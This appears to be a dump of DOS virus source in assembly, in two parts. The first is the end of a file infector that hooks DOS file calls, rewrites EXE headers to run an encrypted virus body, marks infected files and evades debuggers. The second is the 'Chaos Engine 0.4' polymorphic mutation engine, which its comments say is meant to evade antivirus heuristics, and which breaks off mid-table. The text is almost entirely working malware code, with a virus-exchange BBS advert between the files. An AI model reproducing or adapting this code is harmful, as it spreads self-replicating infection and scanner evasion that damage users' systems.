|
||||
ja Error1
|
||||
push cs
|
||||
pop es
|
||||
mov si,dx
|
||||
mov di,offset Signature
|
||||
add di,ax
|
||||
cmp word ptr [si],"ZM"
|
||||
jne Error1
|
||||
cmp word ptr [si+12h],0DEADh
|
||||
je Error1
|
||||
cmp cx,18h
|
||||
jb CheckHandle
|
||||
or ax,ax
|
||||
jz Ok
|
||||
CheckHandle: cmp bx,cs:Handle
|
||||
jne Error1
|
||||
Ok: add cx,ax
|
||||
cmp cx,18h
|
||||
jbe CountOk
|
||||
mov cx,18h
|
||||
CountOk: sub cx,ax
|
||||
jbe Error1
|
||||
cld
|
||||
rep movsb
|
||||
mov cs:Handle,bx
|
||||
Error1: jmp Old21
|
||||
|
||||
CloseFile: push cs
|
||||
pop ds
|
||||
push cs
|
||||
pop es
|
||||
mov ax,4400h
|
||||
call Dos
|
||||
test dl,80h
|
||||
jne Error1
|
||||
or bx,bx
|
||||
je Read
|
||||
cmp cs:Handle,bx
|
||||
je DoNotRead
|
||||
Read: xor al,al
|
||||
call Seek
|
||||
jc Error1
|
||||
mov ah,3fh
|
||||
mov cx,18h
|
||||
mov dx,offset Signature
|
||||
call Dos
|
||||
jc Error1
|
||||
DoNotRead: mov cs:Handle,0
|
||||
cmp Signature,"ZM"
|
||||
jne Error1
|
||||
cmp ChkSum,0DEADh
|
||||
je Error1
|
||||
mov ax,ExeIP
|
||||
mov OldIP,ax
|
||||
mov ax,ExeCS
|
||||
mov OldCS,ax
|
||||
mov ax,ExeSS
|
||||
mov OldSS,ax
|
||||
mov ax,ExeSP
|
||||
mov OldSP,ax
|
||||
mov al,2
|
||||
call Seek
|
||||
jc Error1
|
||||
push ax
|
||||
push dx
|
||||
mov cx,200h
|
||||
div cx
|
||||
cmp PartPage,dx
|
||||
jne SizeError
|
||||
add dx,-1
|
||||
adc ax,0
|
||||
cmp PageCount,ax
|
||||
SizeError: pop dx
|
||||
pop ax
|
||||
jne Error2
|
||||
add ax,0fh
|
||||
adc dx,0
|
||||
and ax,0fff0h
|
||||
mov cx,dx
|
||||
mov dx,ax
|
||||
mov ax,4200h
|
||||
call Dos
|
||||
jnc SeekOk
|
||||
Error2: jmp Old21
|
||||
SeekOk: mov cx,10h
|
||||
div cx
|
||||
sub ax,HdrSize
|
||||
mov ExeCS,ax
|
||||
mov ExeIP,offset Decrypt1
|
||||
mov ExeSS,ax
|
||||
mov ExeSP,VirusSize1+400h
|
||||
cmp MinMem,40h
|
||||
jae MemoryOk
|
||||
mov MinMem,40h
|
||||
cmp MaxMem,40h
|
||||
jae MemoryOk
|
||||
mov MaxMem,40h
|
||||
MemoryOk: push ds
|
||||
push es
|
||||
mov ax,cs
|
||||
mov ds,ax
|
||||
add ax,(VirusSize2+0fh)/10h
|
||||
mov es,ax
|
||||
mov cx,VirusSize1
|
||||
xor si,si
|
||||
xor di,di
|
||||
cld
|
||||
rep movsb
|
||||
mov ds,ax
|
||||
mov cx,offset StartEncrypt-Decrypt2
|
||||
mov dl,byte ptr ds:Decrypt1[6]
|
||||
mov si,offset StartEncrypt-1
|
||||
Again1: xor ds:[si],dl
|
||||
dec si
|
||||
loop Again1
|
||||
mov cx,(VirusEnd1-StartEncrypt+1)/2
|
||||
mov dh,dl
|
||||
mov si,offset StartEncrypt
|
||||
Again2: xor ds:[si],dx
|
||||
mov ax,ds:[si]
|
||||
add dx,ax
|
||||
inc si
|
||||
add dx,ax
|
||||
inc si
|
||||
loop Again2
|
||||
mov ah,40h
|
||||
mov cx,VirusSize1
|
||||
xor dx,dx
|
||||
call Dos
|
||||
pop ds
|
||||
pop es
|
||||
jc Error3
|
||||
mov al,2
|
||||
call Seek
|
||||
jc Error3
|
||||
mov cx,200h
|
||||
div cx
|
||||
mov PartPage,dx
|
||||
add dx,-1
|
||||
adc ax,0
|
||||
mov PageCount,ax
|
||||
mov ChkSum,0DEADh
|
||||
xor al,al
|
||||
call Seek
|
||||
jc Error3
|
||||
mov ah,40h
|
||||
mov cx,18h
|
||||
mov dx,offset Signature
|
||||
call Dos
|
||||
Error3: jmp Old21
|
||||
|
||||
Count dw 8
|
||||
DebugStr db 'DEBUG'
|
||||
CommandStr db 'COMMAND '
|
||||
|
||||
DebugWatch: push ax
|
||||
push cx
|
||||
push dx
|
||||
push si
|
||||
push di
|
||||
push ds
|
||||
push es
|
||||
dec cs:Count
|
||||
jnz EndWatch
|
||||
mov cs:Count,8
|
||||
mov ax,0b000h
|
||||
mov ds,ax
|
||||
mov cx,2
|
||||
push cs
|
||||
pop es
|
||||
cld
|
||||
NextScreen: push cx
|
||||
mov cx,2000
|
||||
xor si,si
|
||||
mov di,offset DebugStr
|
||||
NextChar1: mov dx,5
|
||||
NextChar2: lodsb
|
||||
inc si
|
||||
and al,0dfh
|
||||
scasb
|
||||
jne CharOk
|
||||
dec dx
|
||||
jnz NextChar2
|
||||
Alarm: pop cx
|
||||
lds si,cs:HackAddress
|
||||
cmp byte ptr ds:[si],0cdh
|
||||
jne EndWatch
|
||||
mov ax,cs:SavedCode
|
||||
mov ds:[si],ax
|
||||
xor cx,cx
|
||||
mov ds,cx
|
||||
mov ax,cs:OldInt8o
|
||||
mov ds:[20h],ax
|
||||
mov ax,cs:OldInt8s
|
||||
mov ds:[22h],ax
|
||||
mov es,cx
|
||||
push cs
|
||||
pop ds
|
||||
mov cx,14
|
||||
mov si,offset EndWatch-2
|
||||
mov di,4f0h
|
||||
push es
|
||||
push di
|
||||
rep movsb
|
||||
xor di,di
|
||||
mov cx,VirusSize2
|
||||
push cs
|
||||
pop es
|
||||
retf
|
||||
CharOk: neg dx
|
||||
add dx,5
|
||||
sbb di,dx
|
||||
sub si,dx
|
||||
sub si,dx
|
||||
loop NextChar1
|
||||
ScreenOk: mov ax,ds
|
||||
add ax,800h
|
||||
mov ds,ax
|
||||
pop cx
|
||||
loop NextScreen
|
||||
jmp short EndWatch
|
||||
rep stosb
|
||||
EndWatch: pop es
|
||||
pop ds
|
||||
pop di
|
||||
pop si
|
||||
pop dx
|
||||
pop cx
|
||||
pop ax
|
||||
db 0eah
|
||||
OldInt8o dw ?
|
||||
OldInt8s dw ?
|
||||
|
||||
db '***** (C) COPYRIGHT 1992 BY THE WRITER *****'
|
||||
|
||||
VirusEnd1 equ $
|
||||
|
||||
FirstMCB dw ?
|
||||
RegAX dw ?
|
||||
RegSP dw ?
|
||||
|
||||
Handle dw ?
|
||||
Signature dw ?
|
||||
PartPage dw ?
|
||||
PageCount dw ?
|
||||
ReloCnt dw ?
|
||||
HdrSize dw ?
|
||||
MinMem dw ?
|
||||
MaxMem dw ?
|
||||
ExeSS dw ?
|
||||
ExeSP dw ?
|
||||
ChkSum dw ?
|
||||
ExeIP dw ?
|
||||
ExeCS dw ?
|
||||
|
||||
VirusEnd2 equ $
|
||||
|
||||
virus ends
|
||||
|
||||
end Main
|
||||
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ;
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
|
||||
|
|
@ -0,0 +1,862 @@
|
|||
radix 16
|
||||
|
||||
;*****************************************
|
||||
;* T.H.E - C.H.A.O.S - E.N.G.I.N.E - 0.4 *
|
||||
;*****************************************
|
||||
;1995 - Sepultura - Australia
|
||||
;;
|
||||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||||
;;;on CALLing of TCE -
|
||||
;;;AX = TCE Flags:1 - Pad To DECRYPTOR_LENGTH.
|
||||
;;; 2 - Make Short Decryptor (No Junk).
|
||||
;;; 4 - Add Segment Overide.
|
||||
;;;
|
||||
;;;CX = Length of Code to Encrypt.
|
||||
;;;DX = Delta Offset.
|
||||
;;;DS:SI = Code to encrypt (DS _MUST_ = CS).
|
||||
;;;ES:DI = Location of Buffer to Create Decryptor in.
|
||||
;;;
|
||||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||||
;;;ON RETURN:
|
||||
;;;ES = DS = Segment of Decryptor / Encrypted Code
|
||||
;;;DX = Pointer to Start of Code
|
||||
;;;CX = Length of Code
|
||||
;;;;;;;;;;;;;;;;;;;
|
||||
;;;Flag EQUates
|
||||
|
||||
MAKE_SMALL equ 1
|
||||
PAD_TO_MAX equ 2
|
||||
ADD_SEG equ 4
|
||||
|
||||
;;;;;;;;;;;;;;;;;;;
|
||||
;;;W.H.A.T.E.V.E.R
|
||||
|
||||
DECRYPTOR_LENGTH equ 190h
|
||||
MAX_PADDING equ 90h - 1f
|
||||
length_1 equ (offset int_tbl - offset one_byters)-1
|
||||
|
||||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||||
;;;REGISTER TABLE - INTEL STANDLE FORMAT
|
||||
|
||||
tce_AX equ 0000xB
|
||||
tce_CX equ 0001xB
|
||||
tce_DX equ 0010xB
|
||||
tce_BX equ 0011xB
|
||||
tce_SP equ 0100xB
|
||||
tce_BP equ 0101xB
|
||||
tce_SI equ 0110xB
|
||||
tce_DI equ 0111xB
|
||||
|
||||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||||
;;;THe BeLoW InSTuCTiOn CaN KilL A MaN
|
||||
|
||||
db '[TCE-0.4]',0
|
||||
|
||||
;*****************************************************
|
||||
;*****************************************************
|
||||
;*** The REAL _REAL_ START of THE CHAOS ENGINE 0.4 ***
|
||||
;*****************************************************
|
||||
;*****************************************************
|
||||
|
||||
tce: push ax,bx,bp
|
||||
push di,si
|
||||
|
||||
cld
|
||||
|
||||
mov tce_begin,di
|
||||
mov tce_delta,dx
|
||||
mov c_length,cx
|
||||
mov tce_flags,ax
|
||||
call clear_regs
|
||||
mov B index_sub,0
|
||||
|
||||
mov B[offset more_junk],0b0
|
||||
test W tce_flags,MAKE_SMALL
|
||||
if nz mov B[offset more_junk],0c3
|
||||
|
||||
push si
|
||||
call get_rand_1f
|
||||
add ax,MAX_PADDING
|
||||
xchg cx,ax
|
||||
call more_junk
|
||||
|
||||
swap0: mov si,offset init_1
|
||||
lodsw
|
||||
call binary
|
||||
jz no_swap1
|
||||
xchg ax,[si]
|
||||
mov [si-2],ax
|
||||
|
||||
no_swap1:
|
||||
push ax
|
||||
lodsw
|
||||
call binary
|
||||
jnz no_swap2
|
||||
xchg ax,[si]
|
||||
mov [si-2],ax
|
||||
|
||||
no_swap2:
|
||||
push ax
|
||||
lodsw
|
||||
lodsw
|
||||
call binary
|
||||
jz build_code
|
||||
xchg ax,[si]
|
||||
mov [si-2],ax
|
||||
|
||||
build_code:
|
||||
pop ax
|
||||
call ax
|
||||
call pad_10
|
||||
pop ax
|
||||
call ax
|
||||
call pad_10
|
||||
call W init_3
|
||||
call pad_10
|
||||
call gen_decrypt
|
||||
call pad_8
|
||||
call W init_4
|
||||
call pad_8
|
||||
call W init_5
|
||||
call pad_10
|
||||
call gen_loop
|
||||
call pad_8
|
||||
|
||||
test W tce_flags,PAD_TO_MAX
|
||||
jz no_padding
|
||||
|
||||
mov B[offset more_junk],0b0
|
||||
mov cx,DECRYPTOR_LENGTH
|
||||
add cx,tce_begin
|
||||
sub cx,di
|
||||
call more_junk
|
||||
|
||||
no_padding:
|
||||
mov ax,di
|
||||
sub ax,DECRYPTOR_LENGTH
|
||||
add enc_index,ax
|
||||
mov bx,W index_loc
|
||||
cmp B index_sub,1
|
||||
if e neg ax
|
||||
add es:[bx],ax
|
||||
|
||||
pop si
|
||||
mov cx,c_length
|
||||
rep movsb
|
||||
mov dx,tce_begin
|
||||
mov ds,es
|
||||
call encryptor
|
||||
mov cx,di
|
||||
sub cx,dx
|
||||
|
||||
pop si,di
|
||||
pop bp,bx,ax
|
||||
ret
|
||||
|
||||
init_count: ;Initialises Count Register..
|
||||
call get_unused_reg ;Make Count Initialiser in Encryptor and
|
||||
cmp al,tce_DX
|
||||
je init_count
|
||||
mov count_reg,al ;Decryptor
|
||||
mov bx,W c_length
|
||||
shr bx,1
|
||||
mov W enc_length,bx
|
||||
call gen_mov_reg
|
||||
ret
|
||||
|
||||
init_index: ;Initialises Index Register..
|
||||
mov ax,0ff ;Makes Index Initialiser in Encryptor and
|
||||
call get_rand ;Decryptor..
|
||||
push ax
|
||||
call get_rand_7
|
||||
pop ax
|
||||
if z xor ax,ax
|
||||
mov B index_off,al
|
||||
mov bx,DECRYPTOR_LENGTH
|
||||
add bx, tce_begin
|
||||
mov W enc_index,bx
|
||||
add bx, tce_delta
|
||||
cbw
|
||||
sub bx,ax
|
||||
|
||||
get_index:
|
||||
call get_unused_reg
|
||||
cmp al,tce_BX
|
||||
jb get_index
|
||||
mov W index_num,ax
|
||||
mov B index_reg,al
|
||||
mov B index_set,1
|
||||
call gen_mov_reg
|
||||
mov B index_set,0
|
||||
ret
|
||||
|
||||
gen_decrypt: ;generates DECRYPTOR / ENCRYPTOR instruction
|
||||
mov W loop_start,di
|
||||
call pad_8
|
||||
mov bl,B key_reg
|
||||
sal bl,3
|
||||
call get_rand_2
|
||||
add ax,ax
|
||||
add ax,offset enc_table
|
||||
xchg si,ax
|
||||
lodsw
|
||||
call binary
|
||||
if z xchg ah,al
|
||||
push ax
|
||||
cmp si,offset enc_table + 2
|
||||
jne no_carry_set
|
||||
mov al,0f8
|
||||
call binary
|
||||
if z inc ax
|
||||
mov B enc_cf,al
|
||||
stosb
|
||||
|
||||
no_carry_set:
|
||||
test W tce_flags,ADD_SEG
|
||||
jz no_seg_set
|
||||
mov al,2e
|
||||
stosb
|
||||
|
||||
no_seg_set:
|
||||
pop ax
|
||||
stosb
|
||||
mov B enc_loop,ah
|
||||
mov si,W index_num
|
||||
|
||||
cmp B index_reg,tce_BP
|
||||
je encryptor_has_offset
|
||||
cmp B index_off,0
|
||||
jne encryptor_has_offset
|
||||
push ax
|
||||
call get_rand_7
|
||||
pop ax
|
||||
jz encryptor_has_offset
|
||||
add si,index_tab_c
|
||||
lodsb
|
||||
or al,bl
|
||||
stosb
|
||||
ret
|
||||
|
||||
encryptor_has_offset:
|
||||
add si,index_tab_b
|
||||
lodsb
|
||||
or al,bl
|
||||
mov ah,B index_off
|
||||
or al,bl
|
||||
stosw
|
||||
xchg al,ah
|
||||
cbw
|
||||
call binary
|
||||
jnz ret
|
||||
mov al,ah
|
||||
stosb
|
||||
add es:B[di-3],40
|
||||
ret
|
||||
|
||||
modify_key: ;Modify Key: XOR/ADD/SUB key_reg,xxxx
|
||||
call get_rand_7
|
||||
jz no_mod_key
|
||||
call get_rand_2
|
||||
add ax,offset modify_table
|
||||
xchg si,ax
|
||||
lodsb
|
||||
mov ah,al
|
||||
mov al,81
|
||||
mov W enc_mod_op,ax
|
||||
or ah,B key_reg
|
||||
stosw
|
||||
call get_any_rand
|
||||
stosw
|
||||
|
||||
no_mod_key:
|
||||
mov W enc_mod_val,ax
|
||||
|
||||
ret
|
||||
|
||||
inc_index: ;increase index by 2..
|
||||
call binary ;1 in 2 chance of ADD reg,2/SUB reg,-2
|
||||
jz add_sub_index
|
||||
|
||||
mov al,B index_reg
|
||||
or al,40
|
||||
stosb
|
||||
call pad_8
|
||||
stosb
|
||||
ret
|
||||
|
||||
add_sub_index:
|
||||
mov al,83
|
||||
stosb
|
||||
mov ah,2
|
||||
mov al,B index_reg
|
||||
or al,0c0
|
||||
|
||||
call binary
|
||||
jnz put_add_sub_index
|
||||
|
||||
neg ah
|
||||
or al,0e8
|
||||
|
||||
put_add_sub_index:
|
||||
stosw
|
||||
ret
|
||||
|
||||
gen_loop:
|
||||
mov al,B count_reg
|
||||
cmp al,tce_CX
|
||||
jne not_CX
|
||||
|
||||
push ax
|
||||
call get_rand_7
|
||||
pop ax
|
||||
jz not_CX
|
||||
|
||||
lea bx,[di+2]
|
||||
mov ax,W loop_start
|
||||
sub ax,bx
|
||||
mov ah,0e2
|
||||
call binary
|
||||
jnz no_loop_nz
|
||||
xchg bp,ax
|
||||
jmp short do_loop_nz
|
||||
|
||||
no_loop_nz:
|
||||
xchg ah,al
|
||||
stosw
|
||||
ret
|
||||
|
||||
not_CX: xchg bx,ax
|
||||
|
||||
call binary
|
||||
jz count_add_sub
|
||||
|
||||
mov al,48
|
||||
or al,bl
|
||||
stosb
|
||||
jmp short zero_test
|
||||
|
||||
|
||||
count_add_sub:
|
||||
mov al,83
|
||||
stosb
|
||||
mov ah,-1
|
||||
mov al,bl
|
||||
or al,0c0
|
||||
|
||||
call binary
|
||||
jnz put_add_sub_count
|
||||
|
||||
neg ah
|
||||
or al,0e8
|
||||
|
||||
put_add_sub_count:
|
||||
stosw
|
||||
xor bp,bp
|
||||
push ax
|
||||
call get_rand_7
|
||||
pop ax
|
||||
jz nloop_nz
|
||||
|
||||
zero_test:
|
||||
call pad_10
|
||||
xor bp,bp
|
||||
do_loop_nz:
|
||||
mov al,B count_reg
|
||||
mov bl,al
|
||||
sal al,3
|
||||
or al,bl
|
||||
xchg ah,al
|
||||
mov bh,ah
|
||||
call get_rand_2
|
||||
add ax,offset zero_test_a
|
||||
xchg si,ax
|
||||
lodsb
|
||||
mov ah,bh
|
||||
or ah,0c0
|
||||
stosw
|
||||
|
||||
nloop_nz:
|
||||
lea bx,[di+2]
|
||||
mov ax,W loop_start
|
||||
sub ax,bx
|
||||
or bp,bp
|
||||
jnz loop_nz
|
||||
mov ah,075
|
||||
call binary
|
||||
jnz nnnn
|
||||
mov B es:[di],0f8
|
||||
inc di
|
||||
sub ax,0fe01
|
||||
db 0a9
|
||||
|
||||
loop_nz:mov ah,0e0
|
||||
|
||||
|
||||
nnnn: xchg ah,al
|
||||
stosw
|
||||
ret
|
||||
|
||||
init_key:
|
||||
call get_any_rand
|
||||
mov W enc_key,ax
|
||||
xchg bx,ax
|
||||
call get_unused_reg
|
||||
mov B key_reg,al
|
||||
|
||||
gen_mov_reg:
|
||||
call binary
|
||||
jz lea_mov
|
||||
|
||||
or al,0b8
|
||||
stosb
|
||||
xchg ax,bx
|
||||
jmp short put_mov_b
|
||||
|
||||
lea_mov:call binary
|
||||
jz zero_then_add
|
||||
|
||||
sal al,3
|
||||
or al,06
|
||||
mov ah,8d
|
||||
xchg ah,al
|
||||
stosw
|
||||
xchg ax,bx
|
||||
jmp short put_mov_b
|
||||
|
||||
zero_then_add: ;Zero Register (XOR/SUB reg,reg)
|
||||
push bx ;Then OR/XOR/ADD Value
|
||||
push ax ;or SUB -Value
|
||||
mov ah,0c0
|
||||
or ah,al
|
||||
sal al,3
|
||||
or ah,al
|
||||
mov al,29
|
||||
call binary
|
||||
if z mov al,31
|
||||
stosw
|
||||
call pad_10
|
||||
pop bx
|
||||
call get_rand_2
|
||||
add ax,offset value_from_0
|
||||
xchg si,ax
|
||||
lodsb
|
||||
call binary
|
||||
jz zero_then_sub
|
||||
|
||||
or al,bl
|
||||
mov ah,81
|
||||
xchg ah,al
|
||||
stosw
|
||||
pop ax
|
||||
|
||||
put_mov_b:
|
||||
cmp B index_set,01
|
||||
if e mov W index_loc,di
|
||||
stosw
|
||||
ret
|
||||
|
||||
zero_then_sub:
|
||||
cmp B index_set,01
|
||||
if e mov B index_sub,1
|
||||
mov al,0e8
|
||||
or al,bl
|
||||
mov ah,81
|
||||
xchg ah,al
|
||||
stosw
|
||||
pop ax
|
||||
neg ax
|
||||
jmp short put_mov_b
|
||||
|
||||
pad_8: push ax ;Sub Procedure to Pad Between 1 and 8 bytes
|
||||
call get_rand_7
|
||||
inc ax
|
||||
jmp short padder
|
||||
|
||||
pad_10: push ax
|
||||
call get_rand_1f ;Sub Procedure to Pad Between 8 and 16 bytes
|
||||
or al,8
|
||||
padder: xchg cx,ax
|
||||
call more_junk
|
||||
pop ax
|
||||
ret
|
||||
|
||||
|
||||
more_junk:
|
||||
mov al,03
|
||||
call get_rand_b
|
||||
jnz mj0
|
||||
|
||||
mov B [offset code_jmp],083 ;Re-Enable Jumps
|
||||
mov ax,cx ;else normal filler junk (1 in 16)
|
||||
cmp ax,40
|
||||
if a mov al,40
|
||||
call get_rand_b
|
||||
xchg bx,ax
|
||||
call fill_jnk
|
||||
jmp short mj2
|
||||
|
||||
mj0: ;8 in 16 chance of some type of jump
|
||||
call code_jmp
|
||||
|
||||
|
||||
mj2: jcxz ret
|
||||
jmp short more_junk
|
||||
|
||||
|
||||
one_byte: ;GENERATES A ONE BYTE JUNK INSTRUCTION
|
||||
jcxz ret
|
||||
mov si,one_byters ;FROM one_byters TABLE
|
||||
mov al,length_1
|
||||
call get_rand_b
|
||||
add si,ax
|
||||
movsb
|
||||
dec cx
|
||||
dec bx
|
||||
ret
|
||||
|
||||
reg_op: call get_rand_7 ;ANY OP unused_reg16,reg16..
|
||||
sal al,3
|
||||
or al,3
|
||||
xchg dx,ax
|
||||
call get_unused_reg
|
||||
sal al,3
|
||||
mov dh,al
|
||||
call get_rand_7
|
||||
do_op: or dh,al
|
||||
or dh,0c0
|
||||
xchg dx,ax
|
||||
put_2: cmp bx,2
|
||||
jb one_byte
|
||||
stosw
|
||||
dec cx,2
|
||||
dec bx,2
|
||||
ret
|
||||
|
||||
|
||||
lea_reg:call get_rand_7 ;LEA unused_reg,[BP/BX/SI/DI]
|
||||
cmp al,6
|
||||
je lea_reg
|
||||
|
||||
xchg dx,ax
|
||||
call get_unused_reg
|
||||
sal al,3
|
||||
or al,dl
|
||||
mov ah,08d
|
||||
xchg ah,al
|
||||
|
||||
jmp short put_2
|
||||
|
||||
op_ax: call get_any_rand
|
||||
and al,8
|
||||
or al,5
|
||||
and ah,3
|
||||
shr ah,4
|
||||
or al,ah
|
||||
|
||||
put_3: cmp bx,3
|
||||
jb reg_op
|
||||
stosb
|
||||
call get_any_rand
|
||||
put_3b: stosw
|
||||
sub cx,3
|
||||
sub bx,3
|
||||
ret
|
||||
|
||||
mov_reg:call get_unused_reg ;MOV unused_reg16,xxxx
|
||||
or al,0b8
|
||||
jmp short put_3
|
||||
|
||||
|
||||
op_reg_im: ;cmp/add/sub/adc/sbb/or/xor/and reg16,imm16
|
||||
cmp bx,4
|
||||
jb op_ax
|
||||
call get_unused_reg
|
||||
mov ah,81
|
||||
xchg dx,ax
|
||||
call get_rand_7
|
||||
sal al,3
|
||||
or ax,dx
|
||||
xchg ah,al
|
||||
or ah,0c0
|
||||
stosw
|
||||
call get_any_rand
|
||||
stosw
|
||||
sub bx,4
|
||||
sub cx,4
|
||||
ret
|
||||
|
||||
|
||||
code_jmp:
|
||||
cmp cx,3
|
||||
jb ret
|
||||
|
||||
mov B [offset code_jmp],0c3 ;Disable Jumps.This ensures Unchained
|
||||
;(TBAV-J) and helps stops heuristics
|
||||
call get_any_rand ;else conditional jmp
|
||||
and ax,1f0f ;between 4 and 43 bytse jmp length
|
||||
add ah,4
|
||||
or al,70 ;conditional jmp instructions are 70
|
||||
;--> 7f
|
||||
push ax
|
||||
call get_rand_1f
|
||||
pop ax
|
||||
if z mov al,0e3
|
||||
xor bx,bx
|
||||
mov bl,ah
|
||||
|
||||
dec cx,2
|
||||
cmp bx,cx
|
||||
jb put_jmp
|
||||
mov bx,cx
|
||||
mov ah,bl
|
||||
|
||||
put_jmp:stosw
|
||||
|
||||
fill_jnk:
|
||||
or bx,bx
|
||||
jz ret
|
||||
|
||||
mov al,((offset binary - offset junk_tbl)/2)-1
|
||||
call get_rand_b
|
||||
add ax,ax
|
||||
add ax,offset junk_tbl
|
||||
xchg si,ax
|
||||
lodsw
|
||||
call ax
|
||||
jmp short fill_jnk
|
||||
|
||||
|
||||
pp_reg: ;generate PUSH reg / junk / POP reg
|
||||
cmp bx,3
|
||||
jb gen_int
|
||||
|
||||
lea ax,[bx-2]
|
||||
shr ax,1
|
||||
call get_rand
|
||||
xchg ax,dx
|
||||
call get_rand_7
|
||||
or al,50
|
||||
stosb
|
||||
dec cx
|
||||
dec bx
|
||||
push ax
|
||||
xchg dx,ax
|
||||
sub bx,ax
|
||||
push bx
|
||||
xchg bx,ax
|
||||
call fill_jnk
|
||||
pop bx
|
||||
pop ax
|
||||
|
||||
call binary
|
||||
jz use_same
|
||||
call get_unused_reg
|
||||
or al,50
|
||||
|
||||
use_same:
|
||||
or al,8
|
||||
stosb
|
||||
dec cx
|
||||
dec bx
|
||||
ret
|
||||
|
||||
|
||||
gen_int:cmp bx,4
|
||||
jb ret
|
||||
|
||||
call get_rand_2
|
||||
|
||||
add ax,ax
|
||||
add ax,offset int_tbl
|
||||
xchg si,ax
|
||||
lodsw
|
||||
mov dx,0cdb4
|
||||
xchg al,dl
|
||||
stosw
|
||||
xchg dx,ax
|
||||
xchg ah,al
|
||||
stosw
|
||||
sub cx,4
|
||||
sub bx,4
|
||||
ret
|
||||
|
||||
junk_tbl: dw offset op_reg_im
|
||||
dw offset op_reg_im
|
||||
dw offset op_reg_im
|
||||
dw offset gen_int
|
||||
dw offset gen_int
|
||||
dw offset pp_reg
|
||||
dw offset pp_reg
|
||||
dw offset reg_op
|
||||
dw offset reg_op
|
||||
dw offset lea_reg
|
||||
dw offset lea_reg
|
||||
dw offset mov_reg
|
||||
dw offset op_ax
|
||||
dw offset one_byte
|
||||
|
||||
binary: push ax
|
||||
mov al,1
|
||||
call get_rand_b
|
||||
pop ax
|
||||
ret
|
||||
|
||||
get_rand_2:
|
||||
mov al,2
|
||||
db 0a9
|
||||
|
||||
get_rand_7:
|
||||
mov al,7
|
||||
db 0a9
|
||||
|
||||
get_rand_1f:
|
||||
mov al,1f
|
||||
db 0a9
|
||||
|
||||
get_any_rand: ;return rnd number in AX between 0 and FFFE
|
||||
mov al,0fe
|
||||
|
||||
get_rand_b:
|
||||
cbw
|
||||
|
||||
get_rand: ;returns random number in AX between 0 and AX
|
||||
push cx,dx
|
||||
inc ax
|
||||
push ax
|
||||
in ax,40
|
||||
xchg cx,ax
|
||||
in ax,40
|
||||
rol ax,cl
|
||||
xchg cx,ax
|
||||
in ax,40
|
||||
xor ax,cx
|
||||
adc ax,1234
|
||||
org $-2
|
||||
last_rand dw 0AAAA
|
||||
mov last_rand,ax
|
||||
pop cx
|
||||
xor dx,dx
|
||||
cmp cx,1
|
||||
adc cx,0
|
||||
div cx
|
||||
xchg dx,ax
|
||||
or ax,ax
|
||||
pop dx,cx
|
||||
ret
|
||||
|
||||
one_byters: cmc ;15 1 byte junk instructions
|
||||
cld
|
||||
std
|
||||
in ax,dx
|
||||
in al,dx
|
||||
lahf
|
||||
cbw
|
||||
nop
|
||||
aaa
|
||||
aas
|
||||
daa
|
||||
das
|
||||
inc ax
|
||||
dec ax
|
||||
xlat
|
||||
|
||||
|
||||
int_tbl: dw 0116 ;AH=01,INT16: Check Keyboard Buffer..
|
||||
dw 0216 ;AH=02,INT16: Get Keyboard States..
|
||||
dw 4d21 ;AH=4D,INT21: Get Program Terminate Status..
|
||||
dw 4d21 ;AH=4D,INT21: Get Program Terminate Status..
|
||||
dw 0d10 ;AH=0D,INT10: Get Video Info..
|
||||
dw 0b21 ;AH=0B,INT21: Check Keyboard Buffer..
|
||||
dw 002a
|
||||
dw 002a
|
||||
|
||||
|
||||
clear_regs: cwd
|
||||
mov B index_reg,dl ;Clears Register Tables
|
||||
mov B key_reg,dl ;(All Regs Free)..
|
||||
mov B count_reg,dl
|
||||
ret
|
||||
|
||||
get_unused_reg: call get_rand_7 ;Return an Unused Register..
|
||||
test al,NOT tce_SP ;But _NOT_ SP, or AX.
|
||||
jz get_unused_reg
|
||||
cmp al,index_reg
|
||||
je get_unused_reg
|
||||
cmp al,count_reg
|
||||
je get_unused_reg
|
||||
cmp al,B key_reg
|
||||
je get_unused_reg
|
||||
ret
|
||||
|
||||
|
||||
;**********************************************
|
||||
;* The Encryptor (Built along with Decryptor) *
|
||||
;**********************************************
|
||||
encryptor: mov cx,1234
|
||||
org $-2
|
||||
enc_length dw 0
|
||||
|
||||
mov bx,1234
|
||||
org $-2
|
||||
enc_index dw 0
|
||||
|
||||
mov ax,1234
|
||||
org $-2
|
||||
enc_key dw 0
|
||||
|
||||
enc_cf: nop
|
||||
enc_loop: xor [bx],ax
|
||||
|
||||
enc_mod_op dw 0
|
||||
enc_mod_val dw 0
|
||||
|
||||
inc bx,2
|
||||
loop enc_cf
|
||||
ret
|
||||
|
||||
;****************************
|
||||
;* Data / Variables / Flags *
|
||||
;****************************
|
||||
|
||||
init_1 dw offset init_count
|
||||
init_2 dw offset init_key
|
||||
init_3 dw offset init_index
|
||||
|
||||
init_4 dw offset inc_index
|
||||
init_5 dw offset modify_key
|
||||
|
||||
;* The Below is A table of Values to Be Used To Choose *
|
||||
;* The Count Register, The Index Register, and The Reg *
|
||||
;* to save SP in During the Decryptor Loop *
|
||||
; BX BP SI DI ;This Table is used To Build
|
||||
index_tab_b: db 0,0,0,47,0,46,44,45 ;The Decryptor Instruction
|
||||
